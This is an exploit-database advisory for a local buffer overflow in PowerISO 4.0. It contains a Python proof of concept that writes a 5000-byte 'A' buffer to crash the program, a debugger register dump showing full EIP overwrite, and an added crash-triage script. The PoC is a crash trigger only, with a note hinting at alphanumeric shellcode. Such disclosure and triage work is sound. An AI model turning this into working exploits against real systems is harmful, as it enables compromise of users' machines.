PowerISO version 4.0 local buffer overflow

2009.09.15
Credit: Dr_IDE
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/env python
####################################################################################
#
# Poweriso 4.0 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested On: XPSP3
# Usage: Create New ISO, Add a New Folder, Paste to Rename Folder, Click Save
# Notes: This must have been fixed somewhere between 4.0 and 4.7
#
####################################################################################
'''
Register state at the crash (OllyDbg dump); EIP is fully overwritten with the
0x41 fill byte, and ESP/EDI point into the pasted folder name:

EAX 00ADDDC0
ECX 00000000
EDX 00004000
EBX 00000000
ESP 0211FA6C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~0"
EBP 00000000
ESI 0211FA20
EDI 00ADC2F0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EIP 41414141
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD5000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +UNORM 3C0A 0012EBE8 00000000
ST1 empty -UNORM F674 00000000 0000000C
ST2 empty 3.3165366670546675450e-4932
ST3 empty 0.0000000000019151440e-4933
ST4 empty 3.3165367202851109490e-4932
ST5 empty +UNORM 0001 0012F674 00000000
ST6 empty +UNORM 000C 000B0418 7E418734
ST7 empty -UNORM ABCD 7E43E577 0012F674
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
'''

# Shellcode must be Alpha Upper
# 5000 bytes of 0x41 ("A"); paste the file contents as the new folder name.
buff = "\x41" * 5000

with open("poweriso.txt", "w") as f1:
    f1.write(buff)
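A crash-triage helper, added here and not part of Dr_IDE's PoC: it parses an OllyDbg-style register dump like the one above (the DUMP text is a constructed, shortened excerpt of it) and reports whether every byte of EIP came from the fill byte and which registers point at the pasted input, which is what separates a controlled overwrite from an unrelated fault.

```python
import re

# Constructed excerpt of the register dump in the PoC above (OllyDbg layout,
# ASCII strings shortened). The trailing "~0" on ESP is the debugger
# truncating its display, not part of the input.
DUMP = """EAX 00ADDDC0
ECX 00000000
EDX 00004000
EBX 00000000
ESP 0211FA6C ASCII "AAAAAAAAAAAAAAAAAAAAAAAA~0"
EBP 00000000
ESI 0211FA20
EDI 00ADC2F0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 41414141
"""

# One 32-bit register per line, optionally followed by OllyDbg's ASCII preview.
REG_RE = re.compile(r'^(E[A-Z]{2}) ([0-9A-Fa-f]{8})(?: ASCII "(.*)")?$', re.M)


def parse_registers(dump):
    """Return {name: (value, ascii_preview_or_None)} for each register line."""
    return {m.group(1): (int(m.group(2), 16), m.group(3))
            for m in REG_RE.finditer(dump)}


def input_bytes_in(value, fill_byte):
    """Count how many of the four bytes of a 32-bit value equal fill_byte."""
    return sum(1 for i in range(4) if (value >> (8 * i)) & 0xFF == fill_byte)


def triage(dump, fill_byte=0x41):
    """Summarise how much of the crash state is derived from the fill pattern."""
    regs = parse_registers(dump)
    eip = regs["EIP"][0]
    controlled = input_bytes_in(eip, fill_byte)
    # Registers whose ASCII preview starts with the pattern point into the input.
    pointing = [name for name, (_, txt) in regs.items()
                if txt and txt.startswith(chr(fill_byte) * 4)]
    return {
        "eip": eip,
        "eip_bytes_from_input": controlled,
        "full_eip_control": controlled == 4,   # 4/4 bytes: return address clobbered
        "regs_pointing_at_input": pointing,
    }


if __name__ == "__main__":
    print(triage(DUMP))
```

A uniform fill pattern proves control but not the distance into the buffer, so a dump like this says "fix the bounded copy" without locating which copy; a partial match (1 to 3 bytes) usually means the fault is a pointer derived from the input rather than a saved return address.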


Copyright 2024, cxsecurity.com
